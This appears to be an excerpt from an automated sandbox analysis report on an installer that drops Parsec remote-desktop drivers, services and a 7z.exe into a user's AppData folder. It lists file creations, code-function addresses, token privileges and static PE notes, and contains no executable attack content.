Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem5.inf
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Windows\INF\c_display.PNF
Source: C:\Windows\System32\drvinst.exeFile deleted: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET636D.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F9D0786_2_00F9D078
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F851346_2_00F85134
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FC88066_2_00FC8806
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FAD9EE6_2_00FAD9EE
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7798C6_2_00F7798C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F9AB246_2_00F9AB24
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F9DD646_2_00F9DD64
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FAF0226_2_00FAF022
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FBF1EC6_2_00FBF1EC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F831C86_2_00F831C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FC328C6_2_00FC328C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F912886_2_00F91288
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7C2046_2_00F7C204
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCE4D16_2_00FCE4D1
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FA541C6_2_00FA541C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FB65F06_2_00FB65F0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCE5C06_2_00FCE5C0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FC469D6_2_00FC469D
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F946406_2_00F94640
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FB87AC6_2_00FB87AC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F8E8E06_2_00F8E8E0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FA19846_2_00FA1984
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FA3BBC6_2_00FA3BBC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F8DCAC6_2_00F8DCAC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F77DE86_2_00F77DE8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCDD606_2_00FCDD60
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F8DF786_2_00F8DF78
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F92F006_2_00F92F00
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_0040755C13_2_0040755C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00406D8513_2_00406D85
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03213039_2_00007FF7CD032130
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD036A2839_2_00007FF7CD036A28
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03EE7039_2_00007FF7CD03EE70
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD039A8C39_2_00007FF7CD039A8C
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD035F0C39_2_00007FF7CD035F0C
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03912839_2_00007FF7CD039128
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD035D2439_2_00007FF7CD035D24
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03595039_2_00007FF7CD035950
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03557C39_2_00007FF7CD03557C
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03BDA039_2_00007FF7CD03BDA0
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03E1C439_2_00007FF7CD03E1C4
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD041E0C39_2_00007FF7CD041E0C
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03C42039_2_00007FF7CD03C420
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD04087839_2_00007FF7CD040878
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD04A89C39_2_00007FF7CD04A89C
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03B8F039_2_00007FF7CD03B8F0
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD0464E039_2_00007FF7CD0464E0
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD035B3839_2_00007FF7CD035B38
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03A76039_2_00007FF7CD03A760
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03576439_2_00007FF7CD035764
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03778439_2_00007FF7CD037784
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD0373B839_2_00007FF7CD0373B8
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_0040755C45_2_0040755C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00406D8545_2_00406D85
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F4DD048_2_00007FF72C2F4DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C30474048_2_00007FF72C304740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3168F048_2_00007FF72C3168F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C30319048_2_00007FF72C303190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C35049048_2_00007FF72C350490
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3014B048_2_00007FF72C3014B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C339D5C48_2_00007FF72C339D5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34DD9448_2_00007FF72C34DD94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34FDF448_2_00007FF72C34FDF4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C308DD048_2_00007FF72C308DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C347E1C48_2_00007FF72C347E1C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C348EE448_2_00007FF72C348EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32FF5C48_2_00007FF72C32FF5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C310FE048_2_00007FF72C310FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32E09048_2_00007FF72C32E090
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F706048_2_00007FF72C2F7060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34C95C48_2_00007FF72C34C95C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3139B048_2_00007FF72C3139B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3369B848_2_00007FF72C3369B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C311A8048_2_00007FF72C311A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F4A8048_2_00007FF72C2F4A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C31EAA048_2_00007FF72C31EAA0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32EAB448_2_00007FF72C32EAB4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C31DB7048_2_00007FF72C31DB70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F2BF048_2_00007FF72C2F2BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C341C7048_2_00007FF72C341C70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C340CDC48_2_00007FF72C340CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C33956448_2_00007FF72C339564
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C33E54448_2_00007FF72C33E544
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3435E448_2_00007FF72C3435E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34A24C48_2_00007FF72C34A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32F5C848_2_00007FF72C32F5C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34065C48_2_00007FF72C34065C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32E6A448_2_00007FF72C32E6A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C33D6AC48_2_00007FF72C33D6AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C31179048_2_00007FF72C311790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34386048_2_00007FF72C343860
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3388F048_2_00007FF72C3388F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32E8B048_2_00007FF72C32E8B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3148D048_2_00007FF72C3148D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C33213048_2_00007FF72C332130
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3391B848_2_00007FF72C3391B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3401C848_2_00007FF72C3401C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C31F26048_2_00007FF72C31F260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F322048_2_00007FF72C2F3220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32E29448_2_00007FF72C32E294
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34A24C48_2_00007FF72C34A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C33036048_2_00007FF72C330360
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F43A048_2_00007FF72C2F43A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C34B44C48_2_00007FF72C34B44C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2FC4D048_2_00007FF72C2FC4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C32E4A048_2_00007FF72C32E4A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3364AC48_2_00007FF72C3364AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA68B051_2_00007FF7E5AA68B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A9474051_2_00007FF7E5A94740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADF77051_2_00007FF7E5ADF770
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A9319051_2_00007FF7E5A93190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A914B051_2_00007FF7E5A914B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A98DD051_2_00007FF7E5A98DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC196051_2_00007FF7E5AC1960
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD2CE451_2_00007FF7E5AD2CE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD85E451_2_00007FF7E5AD85E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD751C51_2_00007FF7E5AD751C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC958951_2_00007FF7E5AC9589
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA48D051_2_00007FF7E5AA48D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACF8C851_2_00007FF7E5ACF8C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABD8C051_2_00007FF7E5ABD8C0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADA72C51_2_00007FF7E5ADA72C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA179051_2_00007FF7E5AA1790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABF78C51_2_00007FF7E5ABF78C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABE2E451_2_00007FF7E5ABE2E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A8322051_2_00007FF7E5A83220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AAD26051_2_00007FF7E5AAD260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC61E851_2_00007FF7E5AC61E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC812051_2_00007FF7E5AC8120
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AAE19051_2_00007FF7E5AAE190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A8C4D051_2_00007FF7E5A8C4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A843A051_2_00007FF7E5A843A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD03DC51_2_00007FF7E5AD03DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD137051_2_00007FF7E5AD1370
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABDED451_2_00007FF7E5ABDED4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A84DD051_2_00007FF7E5A84DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABEDF851_2_00007FF7E5ABEDF8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC8D9451_2_00007FF7E5AC8D94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACCD7051_2_00007FF7E5ACCD70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACFD5C51_2_00007FF7E5ACFD5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADF0D451_2_00007FF7E5ADF0D4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABE0E051_2_00007FF7E5ABE0E0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADD07451_2_00007FF7E5ADD074
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A8706051_2_00007FF7E5A87060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA0FE051_2_00007FF7E5AA0FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD2F6051_2_00007FF7E5AD2F60
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABDAC451_2_00007FF7E5ABDAC4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA1A8051_2_00007FF7E5AA1A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A84A8051_2_00007FF7E5A84A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA39B051_2_00007FF7E5AA39B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC89E851_2_00007FF7E5AC89E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABDCD051_2_00007FF7E5ABDCD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC5CDC51_2_00007FF7E5AC5CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACDC4051_2_00007FF7E5ACDC40
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADBC3C51_2_00007FF7E5ADBC3C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A82BF051_2_00007FF7E5A82BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABFB9051_2_00007FF7E5ABFB90
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040755C65_2_0040755C
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00406D8565_2_00406D85
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818196071_2_00007FF618181960
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181889E871_2_00007FF6181889E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618192CE471_2_00007FF618192CE4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618158DD071_2_00007FF618158DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61815319071_2_00007FF618153190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181514B071_2_00007FF6181514B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61814C4D071_2_00007FF61814C4D0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819F77071_2_00007FF61819F770
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61815474071_2_00007FF618154740
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181668B071_2_00007FF6181668B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181639B071_2_00007FF6181639B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618144A8071_2_00007FF618144A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618161A8071_2_00007FF618161A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817DAC471_2_00007FF61817DAC4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817FB9071_2_00007FF61817FB90
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618142BF071_2_00007FF618142BF0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818DC4071_2_00007FF61818DC40
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819BC3C71_2_00007FF61819BC3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618185CDC71_2_00007FF618185CDC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817DCD071_2_00007FF61817DCD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818FD5C71_2_00007FF61818FD5C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818CD7071_2_00007FF61818CD70
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618188D9471_2_00007FF618188D94
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618144DD071_2_00007FF618144DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817EDF871_2_00007FF61817EDF8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817DED471_2_00007FF61817DED4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618192F6071_2_00007FF618192F60
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618160FE071_2_00007FF618160FE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61814706071_2_00007FF618147060
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819D07471_2_00007FF61819D074
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817E0E071_2_00007FF61817E0E0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819F0D471_2_00007FF61819F0D4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818812071_2_00007FF618188120
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61816E19071_2_00007FF61816E190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181861E871_2_00007FF6181861E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61814322071_2_00007FF618143220
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61816D26071_2_00007FF61816D260
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817E2E471_2_00007FF61817E2E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819137071_2_00007FF618191370
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181443A071_2_00007FF6181443A0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181903DC71_2_00007FF6181903DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819751C71_2_00007FF61819751C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818958971_2_00007FF618189589
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181985E471_2_00007FF6181985E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819A72C71_2_00007FF61819A72C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817F78C71_2_00007FF61817F78C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61816179071_2_00007FF618161790
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61817D8C071_2_00007FF61817D8C0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818F8C871_2_00007FF61818F8C8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181648D071_2_00007FF6181648D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess token adjusted: Load Driver
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: String function: 00007FF618148380 appears 52 times
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: String function: 00007FF6181497D0 appears 99 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: String function: 00007FF72C2F8380 appears 52 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: String function: 00007FF72C30EAE0 appears 53 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: String function: 00007FF72C2F97D0 appears 142 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: String function: 00007FF7E5A897D0 appears 99 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: String function: 00007FF7E5A88380 appears 52 times
Source: uu8v4UUzTU.exeStatic PE information: invalid certificate
Source: uu8v4UUzTU.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-JR54E.tmp.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: is-JBM9N.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-CR69T.tmp.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: is-UEG3C.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-ETRQM.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-DPGTR.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-O65TT.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-VK3B0.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-E0QD0.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-S2KJ6.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-V0EDB.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-E9NUA.tmp.2.drStatic PE information: No import functions for PE file found
Source: is-2OR81.tmp.2.drStatic PE information: No import functions for PE file found
